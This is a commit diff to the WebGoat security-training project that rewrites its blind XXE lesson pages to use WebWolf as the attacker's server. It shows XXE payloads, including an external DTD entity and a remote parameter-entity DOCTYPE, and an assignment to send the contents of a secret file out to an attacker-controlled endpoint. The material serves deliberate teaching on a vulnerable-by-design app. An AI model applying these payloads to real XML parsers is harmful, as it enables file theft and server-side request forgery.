Updated XXE lesson so it also uses WebWolf

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc

@@ -1,39 +1,30 @@
+
 == Blind XXE
 
 In some cases you will see no output because although your attack might have worked the field is not reflected in the output of page.
 Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
-Let's start with an example, in this case we reference a external DTD which we control on our own server.
+Let's start with an example, in this case we reference an external DTD which we control on our own server.
 
-Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server under your control.*
-
-[source]
-----
-curl -i http://localhost:8080/WebGoat/XXE/ping?text=HelloWorld
-
-will result in:
-
-GET curl/7.45.0 HelloWorld
-----
-
-at the server side.
+As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example
+use this server to ping it using `http://localhost:8081/ping?text=HelloWorld
 
 How do we use this endpoint to verify whether we can perform XXE?
 
-In the `~/${user.home}/.webgoat/plugin/XXE` create a file called attack.dtd
+We can again use WebWolf to host a file called `attack.dtd`, create this file with the following contents:
 
 [source]
 ----
 <?xml version="1.0" encoding="UTF-8"?>
-<!ENTITY ping SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=HelloWorld'>
+<!ENTITY ping SYSTEM 'http://localhost:8081/ping?text=HelloWorld'>
 ----
 
-Now submit the form and change the xml to:
+Now submit the form change the xml using to:
 
 [source]
 ----
 <?xml version="1.0"?>
 <!DOCTYPE root [
-<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/XXE/attack.dtd">
+<!ENTITY % remote SYSTEM "http://localhost:8081/WebWolf/files/attack.dtd">
 %remote;
 ]>
 <comment>
@@ -41,16 +32,24 @@ Now submit the form and change the xml to:
 </comment>
 ----
 
-Now if we check our server log we will see:
+Now in WebWolf browse to 'Incoming requests' and you will see:
 
 [source]
 ----
-GET Java/1.8.0_101 HelloWorld
+{
+  "method" : "GET",
+  "path" : "/ping",
+  "headers" : {
+    "request" : {
+      "user-agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
+    },
+  },
+  "parameters" : {
+    "test" : [ "HelloWorld" ],
+  },
+  "timeTaken" : "1"
+}
 ----
 
 So with the XXE we are able to ping our own server which means XXE injection is possible. So with the XXE injection
 we are basically able to reach the same effect as we did in the beginning with the curl command.
-
-[NOTE]
-In this case we use http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd to fetch the dtd but in reality this will
-of course be a host fully under the attackers control.

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc

@@ -1,10 +1,23 @@
 == Blind XXE assignment
 
 In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
-which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server.
-For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
-If you use the Docker based WebGoat environment this file is located here: `/root/.webgoat/XXE/secret.txt`
+which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server. You can use WebWolf to serve your
+DTD.
 
-Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control)
 
-You can login to the Docker container as follows: `docker exec -i -t <<name>> /bin/bash`
+|===
+|OS |Location
+
+|Linux
+|`/home/USER/.webgoat/XXE/secret.txt`
+
+|Windows
+|`c:/Users/USER/.webgoat/XXE/secret.txt`
+
+|Docker
+|`/home/webgoat/.webgoat/XXE/secret.txt`
+|===
+
+Try to upload this file using WebWolf landing page for example: `http://localhost:8081/WebWolf/landing?text=[contents_file]`
+(NOTE: this endpoint is under your full control)
+Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.